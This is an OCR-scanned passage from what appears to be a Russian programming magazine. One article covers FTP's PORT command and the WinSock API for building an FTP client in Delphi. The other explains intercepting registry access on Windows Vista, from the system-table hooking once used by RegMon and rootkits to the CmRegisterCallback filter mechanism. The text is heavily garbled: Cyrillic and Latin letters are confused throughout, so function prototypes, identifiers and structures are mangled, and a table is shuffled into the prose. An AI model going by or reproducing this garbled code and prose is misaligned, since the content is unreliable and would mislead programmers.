Число 122 умножь на 256, в результате получишь 31 232. Теперь к результату 
прибавь 1 05. Если ты правильно нажимал на кнопки калькулятора, то у 
тебя должно получиться число 31 337 — порт, который мы и задавали. 

После отправки команды РОРТ сервер проверит принятые данные. И 
если все тип-топ, то будет создан канал для передачи данных (удаленный 
серверустановитсоединение ствоей программой), а значит, ты сможешь 
отправить команду І_І5Т, и тебе придет список файлов заданной директо- 
рии. После передачи данных сервер сам завершит второе соединение. 

Первый шаг на пути к РТР-клиенту 

Яуже познакомил тебя стеорией РТР-протокола,теперьты представля- 
ешь себе принцип работы программ клиентов, но знаний для реализации 
своего клиента все же мало. Что ж, заполним этот пробел — перейдем к 
рассмотрению сетевых функций. 

Страшный ѴѴіпЗоск АРІ 

В ОеІрЬі есть готовые компоненты, которые существенно облегчают про- 
цесс программирования РТР-клиента, но, ксожалению, при их использо- 
вании зачастую сталкиваешься со всякого рода ограничениями. Лучше 
написать свой РТР-клиент полностью самому, для этого мы воспользуемся 
сетевыми функциями ѴѴіпсіоѵѵз. РІаучившись ими пользоваться, ты смо- 
жешь написать не только РТР-клиент, но и любое другое сетевое приложе- 
ние. Перед вызовом сетевых функций нужно инициализировать сетевую 
библиотеку. Для этой цели необходимо воспользоваться функцией 
ѴѴЗАЗЩгТир, которая описана в модуле ѴѴіпЗоск. раз следующим образом: 

МЗАЗСагДир ЫѴег8ІопК.едиезДесІ: ѵгогсі; ѵаг МЗАБаСа: 
ТМЗАБаба) : Іпкедесіег ; зксісаіі; 

Функции мы передаем два параметра: 

1 .ѵѵѴегзіопПериезЩсІ — версия запрашиваемой библиотеки: 1.1 или 2.0. 
Для корректного указания нужной версии лучше всего воспользоваться 
функцией МакеѴѴогсІ(). Ей нужно передать два параметра — младший и 
старший байт, то есть«1 , 1». 

2.Указатель на структуру ѴѴЗАОаЩ. Послеуспешного выполнения функции, 
в эту структуру попадет информация об инициализированной библиотеке. 




> Лицо будущего РТР-клиента 

Чтобы не занимать место в статье, я не буду приводить описание структуры 
ТѴѴЗАОаІа, при желании ты всегда сможешь его посмотреть, заглянув в 
модульѴѴіпзоск.раз. Если функция выполниласьуспешно, она вернет нам 

0, в противном случае она может вернуть следующие коды ошибок: 
ѴѴ5А5Ѵ5М0ТВЕА0Ѵ — сетевая подсистема не готова к соединению. 
ѴѴЗАЕРАШТ — неверный указатель на структуру ТѴѴЗАОаІа. 

ѴѴЗАРРОСЫМ — превышен предел поддерживаемых ОС задач. 
ѴѴ5АЕІМРРО0РЕ5Б — в блокирующем режиме выполняется операция, 
нужно дождаться ее завершения. 

Получить код ошибки можно вызовом функции ѴѴЗАбеіБазіЕггог, о кото- 
рой я расскажу чуть позже, а сейчас мы посмотрим, как можно освободить 
инициализированную библиотеку ѴѴіпЗоск. 

бипсБіоп МЗАСІеапир : Іпкедег ; зБйсаІІ; 

Функции ничего не нужно передавать в качестве параметров, поскольку 
все, что она делает, — это освобождает инициализированную библиотеку. 
По идее, ее можно не вызывать, так кактеоретически после завершения 
приложения ОС должна это сделать сама, но, не надеясь на программис- 
тов из М5, лучше освободить библиотеку самостоятельно. 

бипсбіоп зоскеЦ (аЕ : іпДедег ; Дуре : іпСедег ; ргобосоі : 
іпДедег) :ТЗоскек; зксісаіі; 

Функция зоскеі после своего успешного выполнения возвращаетобъект 
типа ТЗоскеІ, с помощью которого мы и будем работать с сетью. В качест- 
ве параметров этой функции необходимо передать: 

1 . аТ — семейство протоколов. В нашем примере будет использоваться 
только ТОР, поэтому в этом параметре будем указывать АЕ_ІЫЕТ. Про 
остальные возможные значения этого параметра легко узнать из модуля 
ѴѴіпЗоск.раз или МЗОЫ. 

2Луре — тип нового сокета. Можетприниматьзначения 50СК_5ТПЕАМ 
(передача данных сустановкой соединения) и 50СК_06РАМ (все данные 
передаются без установки соединения). Поскольку мы будем использо- 
вать протокол ТОР, то в этом параметре мы укажем 50СК_5ТРЕАМ. 

3. ргоЩсоІ — протокол. Для ТСР-протокола нужно передать в этот пара- 
метр константу ІРРРОТО_ТСР. 

бипсбіоп Ъіпсі ( 3 : ТЗоскеБ ; ѵагайсІгсТЗоскАсійг; 
пашеіеп: Іпкедег) ііпкедег; зЦсІсаІІ; 

Для связывания локального сетевого адреса с сокетом мы должны вос- 
пользоваться функцией Ьіпсі. Это функция пригодится нам для организа- 
ции канала передачи данных. Давай рассмотрим ее параметры: 1) з — со- 
зданный с помощью функции зоскеі сокет; 2) а сісі г — указатель на структуру 
ТЗоскАсІсІг; 3) размер структуры ТЗоскАсІсІг. При успешном выполнении 
функция вернетО, в случае ошибки — 50СКЕТ_ЕРР0Р. Определить код 
ошибки можно с помощью функции ѴѴЗАбеІ: Ба зіЕггогО. В качестве второго 
параметра нам необходимо передавать указатель на структуру ТЗоскАсІсІ г. 
При программировании сетевых приложений эта структура используется 
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повсеместно, поэтомуты должен еезнатыакже хорошо, каки дырки в 
своих зубах. Описывается структура следующим образом: 

СТРУКТУРА 50СКА00К_Ш 

ТЗоскАскігШ = зоскасІсІг_іп; 

ЗоскАскЗг_Іп = гесогй 

зіп_баті1у: и_зЬогб; 
зіп_рогб : и_збюгб ; 

ЗІп_ас!сІ.г : ТІпАсІсІг ; 

зіп_гего: аггау[0..7] об Скаг; 

епсі; 

В структуре присутствуют следующие параметры: 

1 . зі п_Та т і Іу — семейство протоколов. Этот параметр аналогичен первому 
параметру функции зоскек При применении любых интернет-протоколов 
здесь нужно указать АР_І МЕТ. 

2. зіп_рогІ — порт, который будет использовать наша программа для полу- 
чения данных. Если указать в этом параметре 0, то система сама присвоит 
приложению свободный порт. 

З.зіп_ас1с1г — структура 5 о с кАсІ сі г_І N , в которой хранится информация о 
ІР-адресе. 

4. зіп_ 2 его — совмещение по длине структуры зоскасісіг і п с зоскасісіг и 
наоборот. 

бипсбіоп Іізбеп (з:ТЗоскеб; Ъаскіод : Іпбедег ) : 

Іпбедег; збсісаіі; 

Послеуспешного выполнения функции ЬіпсІ можно приступать к прослуш- 
ке порта в ожидании гостей. Для этого, собственно, и создана функция 
Іізбеп. Функции нужно передать всего два параметра: 1 ] з — сокет, который 
связали с локальным адресом; 2) Ьаскіод — максимальное количество за- 
просов на ожидание подключения. Если функция выполнится успешно, то 
она вернетО, в противном случае — ошибки, коды которых можноузнать 
из модуля ѴѴіпЗоск.раз. 

бипсбіоп Ассерб (ЗгТЗоскеб; асІсЬг: РЗоскАсМг; 

АсМгЬеп: РІпбедег) :ТЗоскеб; збдсаіі; 

Кактолько клиент сделал попытку подключиться (если мы выступаем сер- 
вером), необходимо принять соединение. Этим нехитрым делом и зани- 
мается функция Ассерб В качестве параметров функции нужно передать: 
1) з — сокет; 2) асИг — указатель на структуру БоскАбсІг; 3) АбсІгЬеп 
— размер структуры ЗоскАсІсІг. В случае успешного выполнения функция 
Ассері возвращаетуказатель на сокет, через который мы можем работать 
с подключившимся клиентом. 

бипсбіоп соппесб (з:ТЗоскеЕ; ѵаг пате : ТЗоскАсМг ; 
пашеіеп: іпЕедег) : іпЕедег; зЕйсаІІ; 

Думаю, рассказывать про предназначение функции соппесі не нужно, пос- 
кольку все и так понятно из ее названия. Из параметров функции передаются: 
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1 ) сокет; 2) структура зоскАсІсІг, в которой содержатся данные для подклю- 
чения к серверу (протокол, адрес, порт); 3) размер структуры зоскАсІсІг. Каки 
большинство сетевых функций, в случае успешного выполнения эта функция 
вернетнам 0. 

бипсЕіоп зепй (з:ТЗоскеЕ; ѵаг Виб; 1еп:ІпЕедег; біадз: 
іпЕедег) : ІпЕедег; зЕйсаІІ; 

Для отправки данных в наборе ѴѴіпзоск есть несколько функций, среди 
которых имеется функция с именем зепсі. Рассмотрим ее параметры: 1 ) з 
— сокет, который будет использоваться для отправки данных; 2) Ьиб — бу- 
фер, в котором содержатся данные для отправки; 3) Іеп — размер буфера; 
4) йадз — флаги, влияющие на метод отправки. Мы можем просто указать 
0. Если функция выполнитсяуспешно, то естьсможет отправить данные, 
то в качестве результата она вернет количество фактически отправлен- 
ных данных, в противном случае — ошибку. 

бипсЕіоп гесѵ (з:ТЗоскеЕ; ѵаг Ъиб; Іеп: іпіедег; біадз : 
іпЕедег) : ІпЕедег ; зЕсІсаІІ; 

Функция гесѵ исполняет противоположную функции зепсі роль — она при- 
нимает данные. Ее параметры полностью идентичны параметрам функ- 
ции зепсі, поэтому не будем тратить время и рассматривать их еще раз. 

бипсЕіоп СІозеЗоскеЕ (з :ТЗоскеЕ) : іпЕедег ; зЕсІсаІІ; 

Функция СІозеЗоскеІ необходима для закрытия сокета. По правилам хоро- 
шего тона ее принято вызывать после функции 5ІиЛсІоѵѵп, но программисты 
пренебрегают этими правилами и вызываютее сразу, забывая прозЬиЫоѵѵп. 

бипсЕіоп МЗАСеЕЬазЕЕггог : іпбедег ; зЕсІсаІІ; 

С помощью этой полезной функции можно получить код возникшей ошиб- 
ки при вызове какой-либо другой функции. При вызове ѴѴЗАбеІбазіЕггогО 
сразу же вернет код последней возникшей в системе ошибки. В последс- 
твии его можно проанализировать и довести до пользователя. 

РТР-кл иент — делаем это ! 

Ну вот и настал тот момент, когда мы готовы опробовать наши 
теоретические знания на практике. Запускай Оеірбі и создавай 
новый проект типа Арріісабоп. На форму брось один компонент 
ТРісН ЕсІ іб и один ТМаіпМепи. Поле ТРісЬЕсІібу меня растянуто 
по всей форме, а в ТМаіпМепи созданы элементы меню: 

1 . Соединение 

- Подключиться 

- Отключиться 

- Настройки 
2 . Команды 

- ызт 

- сш 
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По нажатию на кнопку «Настройки» будет вызываться дополнительная 
форма, в которой нужно будет ввести имя пользователя, пароль, сервер 
и порт. 

Кодинг 

Простенький дизайн нашего РТР-клиента готов, поэтому приступаем к 
приготовлению горячей начинки — написанию кода. Первым делом не 
забудь подключить к нашему проекту модуль ѴѴіпзоск. раз, иначе вызов 
сетевых функций будет невозможен. Теперь надо объявить все необходи- 
мые переменные в разделе ргіѵаѣе: 

_™заБаба : ТМЗАБАТА; 

_с1іегЩ8оске1: : ТЗоскеб ; 

_зегѵегЗоске1: : ТЗоскеб ; 

_с1іеп1:Ас1сІг : зоскасісІг_іп; 

_зегѵегАск!г : зоскасіс1г_іп; 

_тосіе : іпДедег ; 

_ДешрЗоскеД : ТЗоскеі: ; 

Об их предназначении ты узнаешь по ходу рассмотрения примера. При 
описании сетевых функций я говорил, что перед их использованием 
нужно инициализировать сетевую библиотеку. Инициализацию сете- 
вой библиотеки я делаю во время создания формы, а ее освобождение 

— во время закрытия окна. Если при этом утебя возникли проблемы, 
то открывай исходник на нашем йѴй и сравнивай. После инициализа- 
ции сетевой библиотеки можно попытаться соединиться с удаленным 
сервером. По нажатию кнопки «Соединиться» у меня вызывается 
самописная процедура _соппесД), которой нужно передать все не- 
обходимые для подключения данные (адрес сервера, логин, пароль, 
порт). Код этой процедуры ты можешьувидеть во врезке «Соединяемся 
с сервером». 

Давай-ка подробно рассмотрим содержимое кода установки соеди- 
нения с удаленным сервером, отображенного в этой врезке. В самом 
начале я создаю новый сокет. Ты уже знаешь, для того чтобы создать 
новый сокет, нужно воспользоваться функцией 50СКЕТ, которая после 
выполнения возвратитуказатель на созданный сокет. После вызова 
функции 50СКЕТ, я проверяю, а не возникла ли ошибка. Если да, то 
я запускаю самописную процедуру ОеіЕггог, передав ей название 
вызываемой функции. Процедура ОеіЕггог попытается получить код 
ошибки и в конце концов проинформирует пользователя, напечатав в 
ТРісЬ ЕсІ И: соответствующий текст. Код процедуры СеіЕггогты можешь 
посмотреть, открыв исходник примера, любезно дожидающийся тебя 
на нашем диске. Если ошибки не возникло, то можно начинать гото- 
виться к соединению с удаленным сервером. Как ты должен помнить, 
чтобы установить соединение с сервером, нужно вызвать функцию 
соппесі, которой необходимо передать структуру типа зоскасІсІг_іп. 

Ну а чтобы ее передать, ее нужно заполнить, что я и делаю. После 
заполнения структуры, я вызываю функцию ѴѴ5ААзупс5еІес1:(). Эта 
функция устанавливает асинхронный режим для выбранного сокета и 
заставляет ѴѴіпсІоѵѵз генерировать сообщения для сетевых событий. 
Таким образом, нам достаточно указать сообщение, которое должно 
приходить окну нашего приложения при возникновении события на 
определенном сокете. 

На первый взгляд может показаться, что этот метод сложен в реализации. 
На самом деле это не так, и через несколько минутты в этом убедишься, но 
сначала давай взглянем на параметры, которые нужно передать функции: 
1 ) в — сокет, за событиями которого необходимо наблюдать; 2) ИѴѴіпсІоѵѵ 

— окно, которое будет принимать сообщения; 3) ѵѵМзд — системное 



событие, которое нужно генерировать; 4) ІЕѵепІ: — сетевые события, за 
которыми мы будем наблюдать. В качестве событий ты можешь указать: 
Р0_РЕА0 (возникает, когда пришли данные), Р0_ѴѴРІТЕ (проявляется, 
когда можно передавать данные), Р0_00В (когда прибыли срочные дан- 
ные), РО_АССЕРТ (когда в очереди сокета есть новое подключение), Рй_ 
СОЫЫЕСТ (при соединении с сервером). В качестве третьего параметра я 
указал лишь Р0_РЕА0. Когда на наш сокет придут данные, главное окно 
нашего приложения получитсообщение ѴѴМ_МУ50СКМЕ55. Чтобы его не 
прозевать, нам нужно написать процедуру, которая будет перехватывать 
нужное сообщение. 

Перед тем как привести код процедуры, я хотел бы объяснить тебе, что 
собой представляет ѴѴМ_МУ50СКМЕ55. В нашем примере это константа, 
которая объявлена мной и равна ѴѴМ_1)5ЕР+1 . Что такое ѴѴМ_П5ЕВ? Это 
число. Все числа, меньше этого, могут уже использоваться системой, 
поэтому, чтобы не было конфликтов, нужно просто использовать это 
число +1 . 

Немного отвлечемся от рассмотрения функции ѴѴЭААзупсЭеІесШ и 
вернемся к разбору кода установки соединения с удаленным сервером. 
После ѴѴЭААзупсЭеІесШ вызывается функция Соппесі, которая начинает 
устанавливать соединение судаленным сервером. По окончанию выпол- 
нения функции Соппесі я приступаю котправке данных для прохождения 
авторизации (вспоминай теорию). Отправка данных реализована в само- 
писной функции _зепсі(). В качестве параметров ей нужно передать сокет, 
через который будут отправлены данные, и сами данные. 

Теперь вернемся к интересной функции ѴѴЗААзупсЗеІесШ- Я уже говорил, 
что для перехвата нужного события необходимо объявить специальную 
процедуру. В примере я объявил ее в разделе ргіѵаіе следующим образом: 

ргосесіиге ИеШЗО (ѵаг М:ТМеззаде) ; шеззаде Ш_ 

МУЗОСКМЕЗЗ; 

Код тела процедуры ты можешьувидеть в примере на диске. Как видно 
из описания, в процедуру передается структура типа ТМеззаде. В этой 
структуре имеется несколько параметров, но нас будут интересовать 
только два: ѴѴРага гл и І_Рагат. В первом хранится дескриптор сокета, на 
котором произошло событие, а во втором — его тип. Для проверки типа я 
использую управляющую структуру САЗЕ, в которой и проверяю интересу- 
ющие меня события. 

При возникновении события Р0_РЕА0 вызывается процедура _гесѵ, кото- 
рая и выполняет чтение данных с определенного сокета. Код процедур _гесѵ 
и_зепсІ (для отправки данных) ты можешьувидеть в исходнике примера. 

Тестирование 

Наш пример наполовину готов, теперь самое время протестировать его 
работоспособность. Попробуем скомпилить наше приложение и подце- 
питься к какому-нибудь Др-серверу. Результаты моего тестирования ты 
можешьувидеть на рисунке. Для теста я подцепился к серверу своего 
хостера и успешно прошел авторизацию. 

Оі5соппесі 

Рассмотреть весь код РТР-клиента в рамках одной статьи просто невоз- 
можно. Поэтому разбираться сустановлением второго соединения (для 
передачи данных) тебе придется самостоятельно. Сильно по этому поводу 
не переживай. Ты всегда можешь заглянуть на наш диски посмотреть 
исходник РТР-клиента, в котором я уже реализовал получения списка 
файлов определенной директории. Весь исходникя постарался макси- 
мально прокомментировать, поэтому с пониманием возникнуть проблем 
не должно. НС 
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ІЛпем на перехват! 

Перехват обращений к реестру в ѴѴіпсІоѵѵз Ѵізіа: практика 

Если ты прочитал предыдущую статью и попробовал разобраться во всех тонкостях про- 
граммирования в режиме ядра, то самое время перейти непосредственно к цели всего это- 
го. Мы попробуем написать драйвер режима ядра, перехватывающий обращения к реестру 
и способный влиять на исход этой операции. 



предыдущем номере я постарался объять необъятное. Я не 
стремился на отведенных мне четырех страницах научить 
тебя писать драйверы, я хотел лишь подтолкнуть настоящих 
хакеров к изучению программирования в кегпеі тобе. 

Тот, кто за этот месяц «проштудировал» интернет на тему ІВР-запросов, 
прерываний, ІР0І_, стеков устройств ит.д., без труда осилит этот материал 
и даже сможет написать модуль режима ядра, реализующий все здесь 
описанное. Итак, приступим. 

Немного истории 

Давным-давно, во времена ѴѴіпбоѵѵз 2000, один программист, а по сов- 
местительству исследователь ОС ѴѴіпбоѵѵз, создал маленькую утилиту под 
названием ПедМоп. В предыдущей статье я уже упоминал о ней, а сейчас 
расскажу чуть подробнее. Эта утилита загружала свой драйвер режима 
ядра, которой перехватывал системные сервисы операционной системы. 
Надо сказать, что практически все прикладные АРІ-функции, произво- 
дящие какие-либо действия с системой, так или иначе в конечном итоге 
обращаются кэтим сервисам. 
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Вызов функции ядра, прежде чем будет передан соответствующей 
ЫабѵеАРІ ядра, предварительно проходит довольно сложную обработ- 
ку. Сначала в третьем кольце вызывается соответствующая функция в 
N1611, где в регистр ЕАХ помещается номер вызываемого системного 
сервиса, а в регистр ЕЭХ — указатель на передаваемые параметры. 
Затем вызывается прерывание 2ЕЬ (в ѴѴіпбоѵѵз ХР — команда зузепіег) 
и происходит переход процесса в нулевое кольцо, где управление 
передается записанному в ЮТ шлюзу прерывания. В этом месте 
окружение третьего кольца переключается на нулевое, выполняется 
смена стека на стек ядра и осуществляется перезагрузка сегментного 
регистра Р5, который в нулевом кольце указывает на совершенно не 
такие структуры, как в третьем кольце. Затем управление передается 
обработчику прерывания 2ЕЬ — функции ядра КіЗузІетЗегѵісе. Она 
копирует передаваемые системному сервису параметры в стекядра 
и производит вызов ЫабѵеАРІ-функции ядра, согласно содержи- 
мому 5егѵісе0езсгір1:огТаЫ.е. Эта таблица находится в памяти ядра 
и представляет собой структуру, содержащую 4таблицы системных 
сервисов (55Т). Первая из них описывает сервисы, экспортируемые 
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ядром Ыозкгпі.ехе], вторая — графической подсистемой (ѵѵі п32к.5уз) , а 
остальные две зарезервированы на будущее и пока не используются. 
Когда какое-либо приложение пытается получить доступ к реестру, оно 
вызывает АРІ-функцию из Абѵарі32.сІІІ. В случае когда приложение пыта- 
ется создать ключ реестра, оно обращается к функции РедСгеаіеКеу или 
РедСгеаІеКеуЕх. В свою очередь код этих функций обращается к шлюзу 
ІМіСгеаІеКеу, находящемуся в пЫП.сШ. Почему я сказал «шлюз» вместо 
«функции»? Все очень просто. На самом деле, №Сгеа1:еКеу не делает ни- 
чего, кроме вызова соответствующего системного сервиса. Схематично 
код этой функции выглядит примернотак: 

ВОЗМОЖНЫЙ КОД МТСРЕАТЕКЕѴ 

шоѵ еах,291і 

Іеа есіх, [езр+4] 

іпС 2ЕІі 

геС 

Как видно из приведенного примера, сначала в регистр еах заносится 
число 29Ь. Это число означает номер системного сервиса втаблице 
дескрипторов системных сервисов. То есть, если говорить проще, 41-й 
элемент в этой таблице является указателем на точку входа в системный 
сервис, который создает ключ в реестре. После того как в еах загружено 
смещение, а в ебх — указатель на передаваемые параметры, вызывается 
специальное прерывание 2ЕЬ для перевода процессора в нулевое коль- 
цо. По найденному втаблице системных сервисов смещению происходит 
переход на код, который дальше выполняет все необходимые действия. 
Драйверутилиты РедМоп занимался тем, что подменял нужные ему 
смещения в этой таблице своими. Таким образом, когда какое-либо 
приложение пыталось обратиться к реестру, вызывался код драйвера 
РедМоп'а, который, собрав нужную ему информацию, делал оригиналь- 
ный вызов, чтобы не приводить системы в нерабочее состояние. Но с 
выходом ѴѴіпсіоѵѵз ѴІ5Іа эту возможность прикрыли, обосновав это тем, что 
этой технологией пользуются руткиты, а для антивирусов, файрволов и 
других подобных программ еще в ѴѴіпсіоѵѵз ХР был предложен специаль- 
ный механизм для перехвата обращений к реестру. 

Фильтрация обращений к реестру 

С выходом ѴѴіпсіоѵѵз ХР появилось понятие гедізігу Шегіпд бгіѵег. Дослов- 
но оно переводится как«драйвер, фильтрующий обращения к реестру». 
Собственно, из названия вытекает и содержание — это драйвер режима 




> Загрузчик ѴѴіпсІоѵѵз Ѵізіа 

ядра, который фильтрует обращения к системному реестру. Фильтрация 
обращений происходит за счетустановки саІІЬаск-вызова на функции 
обращения к реестру. Установить свой саІІЬаск-вызов можно с помощью 
следующей функции: 

ЫТЗ ТАТТЛ 3 

СтВедізЬегСаІІЬаск ( 

Ш РЕХ_САЬЬВАСК_РШСТІ(Ж РипсЬіоп, 

Ш РѴОІБ Сопкехк , 

ОІЛТ РЬАРСЕ_ЮТЕСЕР Соокіе 
) ; 

Здесь Рипсбоп — это указатель на функцию саІІЬаск-вызова, который 
надо зарегистрировать. Сопіехі: — указатель на некую структуру да иных, 
которая содержит служебную информацию и определяется самим драй- 
вером. Соокіе — указатель на переменную типа І_АРѲЕ_ІІ\]ТЕ6ЕР, которая 
идентифицирует саІАЬаск- рутину. В последствии этот параметр будет 
использоваться при снятии саІІЬаск-вызова. Вызов СтРедіз1:егСаІІЬаск 
должен происходить при ІРСН_, меньшем или равном АРС_І_ЕѴЕІ_. В 
ѴѴіпсІоѵѵз Ѵізіа появилась новая функция для этих целей. Ее прототип 
представлен ниже. 

ЫТЗТАТІЛЗ 

СшНедізкегСаІІЬаскЕх ( 

Ш РЕХ_САЬЬВАСК_РШСТІ(Ж Еипскіоп, 

Ш РСШІСОБЕ_ЗТВШС Аікікшіе, 

Ш РѴОІБ Бгіѵег , 

Ш РѴОІБ СопкехС , 

ОІЛТ РЬАКСЕ_ІЫТЕСЕР Соокіе 
РѴОІБ КезегѵесЛ 
) ; 

Как видно из описания функции, некоторые ее параметры схожи с 
предыдущими, но есть и новые. АШіисІе — это указатель на строку 
типа I) N I С О О Е_5Т Р I N 6 , которая используется в драйверах мини- 
фильтрах. йгіѵег — указатель на структуру объекта драйвера, который 
осуществляет вызов. Ну и, наконец, РезегѵесІ, название которого 
говорит само за себя. 

Когда перехватывать обращения к реестру нам больше не нужно, следует 
вызвать функцию СтІіпРедізІегСаІІЬаск. 
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> Новая ОС от МісгозоК 



ЫТЗТАТБЗ 

СтШКедізбегСаІІЪаск ( 

Ш ЬАКСЕ_ІЫТЕСЕК Соокіе 
) ; 

Единственным ее параметром является переменнаятипа 
І_АП6Е_ІМТЕ6ЕП, указатель на которую мы передавали при вызове 
СтРедізіегСаиЬаскЕх/СтРедізІегСаІІЬаск. Если все прошлоудачно, 
функция вернет 5ТАТІ)Б_51)ССЕ55. Если же параметр соокіе не верен, 
результатом работы СтІ)пРедІ5І:егСаІ.І.Ьаск будет 5ТАТІІ5_ІМѴАІ_Ю_ 
РАРАМЕТЕР. Вызов рутины должен происходить на ІРСН_, меньшем или 
равном АРС_І_ЕѴЕІ_. 

КедІБІгу СаІІЬаск Коиііпе 

Теперь, когда мы знаем, какзарегистрировать собственный саІІЬаск- 
вызов на обращение к реестру, пришла пора узнать формат этой самой 
саІІЬаск-функции. Ее прототип должен выглядеть следующим образом: 

ЫТЗТАТБЗ 

КедізкгуСаІІЬаск ( 

Ш РѴОІБ СаНЬаскСопкехк , 

Ш РѴОІБ АгдшпепСІ , 

ІЫ РѴОІБ Агдишеп1:2 
) ; 

Первый параметр — это указатель на переменную, которую мы передава- 
ли в функцию СтРедізІегСаІІЬаск или СтПедІБІегСаІІЬаскЕх. АгдитепЕ 

— это переменная типа РЕѲ_М0ТІРѴ_СІ_А55, которая говорит нашей 
саІІЬаск-рутине отом, вследствие чего произошел ее вызов: создание 
ключа, удаление параметра ит.д. Агдитепі2 — это указатель на структуру, 
которая содержит в себе более подробную информацию о произошед- 
шем. Тип этой структуры определяется переменной АгдигпепЕ . Ниже 
приведена таблица, иллюстрирующая это соответствие. 

СаІІЬас-рутина может повлиять на ход выполнения операции. Так, если 

в ОС ѴѴіпсІоѵѵз ХР и ѴѴіпсІоѵѵз 2003 РедізІгуСаІІЬаск вернет БТАТ1)5_ 
БІІССЕББ.то система продолжит выполнение операции, а если значение, 
при обработке которого макрос ЫТ-БІІССЕББ выдаст РАІ_5Е, то система 
остановитвыполнение операции с определенным нами кодом ошибки. 

В ѴѴіпсіоѵѵб Ѵізіа все немного иначе. Если РедІБІгуСаІІЬаск возвращает 
5ТАТ1)5_5иССЕ5,то система продолжитвыполнение операции. Если 

— 5ТАТІ)5_САІ_І_ВАСК_ВѴРА55, то система прекратит выполнение 
операции, но возвратит 5ТАШ5_51)ССЕ5. И последний вариант, когда 
РедІБІгуСаІІЬаск вернет любое значение (за исключением 5ТАТ1)5_ 



САІ_І_ВАСК_ВѴРА55), при обработке которого макрос І\ІТ_БІ)ССЕББ 
возвращает РАІ_5Е. В этом случае результат аналогичен результату в 
ѴѴіпсіоѵѵб ХР. 

Следует за метить, что обращаться к структуре, указатель на которую мы 
получили в переменной АгдштепЕ, надо только в блоке Ігу\ехсер1:, чтобы 
случайно не получить голубой экран смерти. Еще одним немаловажным 
фактором является то, что саІІЬаск-вызов всегда выполняется на I РОЕ, 
равном РА55ІѴЕ_І_ЕѴЕІ_ в контексте того потока, который инициировал 
обращение ксистемному реестру. 

От теории к практике 

Теперьу нас достаточно знаний, чтобы установить свою саІІЬаск-функцию 
и обработать информацию о произошедшей операции. Какты уже заме- 
тил, РедІБІгуСаІІЬаск может вызываться в двух случаях: до выполнения 
операции и после. Пусть нам надо перехватить момент перед созданием 
некоторого параметра в реестре и момент после удаления некоторого па- 
раметра. Перед тем как приступить непосредственно к написанию кода, 
рассмотрим еще пару структур данных. 

В момент перед созданием или изменением какого-либо параметра 
реестра в Агдитепіі нам придет значение Пед№Рге5е1:ѴаІиеКеу 
или ПедРКБеЕ/аЕеКеу. По сути, это одно и то же значение, прос- 
то программисты Майкрософт придумали ему разные названия. 
Этому значению соответствует структура ПЕ6_5ЕТ_ѴАІ_1)Е_КЕѴ_ 
ІЫРОРМАТЮМ. 

КЕе_5ЕТ_ѴАШЕ_КЕѴ_ШР0КМАТІ0М 

ЬуресЗеб зРгисР _КЕС_ЗЕТ_ѴАШЕ_КЕУ_ШРОКМАТІОЫ { 

РѴОІБ ОЬ^есб; 

РШІСОБЕ_ЗТКШС ѴаІиеЫаше; 

ІІЬОКГС Тікіеіпсіех; 

БЬОКГС Туре ; 

РѴОІБ БаЪа; 

БЬОШ БаЪаЗіге; 

РѴОІБ СаІІСогЩехі:; 

РѴОІБ ОЪз есбСопЬехЬ ; 

РѴОІБ Кезегѵесі; 

} КЕС_ЗЕТ_ѴАШЕ_КЕУ_ІЫРОКМАТІОЫ, *РКЕС_ЗЕТ_ѴАШЕ_ 
КЕУ_ІЫРОКМАТІОЫ ; 

Первым членом этой структуры является указатель на объект ключа 
реестра, в котором создается или изменяется параметр. ѴаІиеЫате 
— это указатель на строку, содержащую имя параметра, который будет 
изменен. ТіЕеІпсІех зарезервировано для системного использования; 



/ііб 
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драйвер должен игнорировать это значе- 
ние. Туре — это тип данных, которые будут 
записаны в этот параметр. Оаіа — указатель 
на буфер сданнымидлязаписивпара- 



метр. ОаІаЗіге — размер буфера данных. 


Соответствие типа структуры, передаваемой в парам ЕТРЕА веимЕмт2,и переменной типа РЕЭ_М0ТІРѴ_СІ.А55 


СаІІСопІехІ: и ОЬіесіСопіехІ — это указатели 


КеоМтОеі-ЕТеКеѵ 


РЕ6_0ЕІ_ЕТЕ_КЕѴ_ІМР0РМАТІ0М 


на структуры данных, которые мы могли 


РеоМтРкеОеі-ЕТеКеу 


РЕ6_РЕІ-ЕТЕ_КЕУ_ІМР0РМАТІ0М 


определить ранее при регистрации саНЬаск- 


РесМтРо5тОеі.етеКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


функции. 


РеоМтБетѴашеКеу 


РЕ6_5ЕТ_ѴАШЕ_КЕѴ_ШР0РМАТІ0М 


Таким образом, перед тем как какое-либо 


РесМтРреЗетѴашеКеу 


РЕ65ЕТѴАШЕКЕѴІЫР0РМАТІ0М 


приложение попытается создать или изменить 


РеоМтРозтЗетѴашеКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0Ы 


тот или иной параметр в реестре, мы неза- 


РеоМтОеі.етеѴашеКеу 


РЕ6_РЕІ-ЕТЕ_ѴАШЕ_КЕѴ_ІМР0РМАТІ0М 


медлительно узнаем об этом и сможем даже 


РеоМтРкеОеі.етеѴашеКеу 


РЕ6_0ЕІ_ЕТЕ_ѴАШЕ_КЕѴ_ІМР0РМАТІ0М 


модифицировать те данные, которые он хочет 


РеоМтРозтОеі.етеѴашеКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0Ы 


записать в реестр. 


РеоМтЗетімрокматіомКеу 


РЕ6_5ЕТ_ШР0РМАТІ0М_КЕѴ_ШР0РМАТІ0Ы 


После удаления какого-либо парамет- 


РеоМтРкеЗетімрокматюмКеу 


РЕ6_5ЕТ_ШР0РМАТІ0М_КЕѴ_ШР0РМАТІ0Ы 


ра АгдитепЛ, нам придетзначение 


РеоМтРо5т5етімрокматюмКеу 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


НедМРозЮеІеІеѴаІиеКеу. Ему соответс- 


РеоРітРемамеКеу 


РЕ6РЕМАМЕКЕѴШР0РМАТІ0М 


твует структура РЕ6_Р05Т_0РЕРАТІ0І\І_ 


РеоМтРкеРемамеКеѵ 


РЕ6_РЕМАМЕ_КЕѴ_ШР0РМАТІ0М 


ІМЕОРМАТІОІМ. 


РеоМтРо5тРемамеКеу 


РЕе_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 




КеоМтЕмомератеКеу 


РЕВ ЕРІІІМЕРАТЕ КЕѴ ШРОРМАТЮМ 


РЕ6_Р05Т_0РЕРАТІ0М_ШР0РМАТІ0М 


РеоМтРкеЕмомекатеКеѵ 


